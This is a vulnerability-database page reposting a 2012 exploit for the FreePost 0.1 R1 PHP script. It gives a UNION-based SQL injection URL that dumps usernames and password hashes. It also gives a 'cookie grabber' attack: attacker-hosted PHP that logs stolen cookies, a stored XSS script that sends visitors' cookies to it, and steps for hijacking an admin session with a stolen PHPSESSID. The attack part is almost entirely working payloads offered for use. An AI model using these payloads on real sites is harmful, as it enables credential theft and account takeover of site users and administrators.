Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FreePost 0.1 R1 SQL Injection

🗓️ 10 Jun 2012 00:00:00Reported by ThE g0bL!NType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

FreePost 0.1 R1 SQL Injection vulnerability from edit.ph

Code
`#####################################################################################################  
# Exploit FreePost 0.1 R1 SQL Injection  
# Date: June 6nd 2012  
# Author: ThE g0bL!N  
# Version: 0.1 R1  
# Vendor Url: http://www.phpbrasil.com/script/dYRoLbwWu_zR/freepost-01-r1  
# Tested on: Xp Service Pack 2  
#####################################################################################################  
# Greets To : Lider Pirata , Yassine Tablouche , Ilyes , Bilal ,  
Habib, Djamal , Boukhors .. etc  
#####################################################################################################  
  
Exploit:  
--------  
1) You Need To register  
2) http://localhost/freepost0.1-R1/edit.php?action=edit&post=1 [SQL CODE]  
3) /edit.php?action=edit&post=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7+from+b2users--  
  
  
#################################################################################################################  
[+] FreePost 0.1 R1 Cookie Grabber Exploit  
[+] Discovered By ThE g0bL!N  
[+] Greets To : Lider Pirata , Yassine Tablouche , Ilyes , Bilal ,  
Habib, Djamal , Boukhors .. etc  
[+] Vendor:http://www.phpbrasil.com/script/dYRoLbwWu_zR/freepost-01-r1  
#################################################################################################################  
PoC  
--  
[+] Make 2 files and upload to your host :  
[+]cookie.php - > Put in this File That Code:  
<?php  
$cookie = $_GET['cookie'];  
$log = fopen("log.txt", "a");  
fwrite($log, $cookie ."\n");  
fclose($log);  
?>  
[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php  
  
[+]Exploit:  
-------  
1)First Register in the site  
2) go to http://site.com/edit.php  
3) add This Code :<script>document.location  
="http://localhost/[path]/cookie.php?cookie=" +  
document.cookie;</script>  
4) any one open this page engenie.php you gonna still his cookies  
  
Example  
-------  
Result:  
------  
PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03  
Then we put that code  
javascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/";  
After That you see :  
Hello Admin :)  
################################################################################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Jun 2012 00:00Current
exploitsql injectionfreepost 0.1 r1vendorcookie grabberthe g0bl!n
18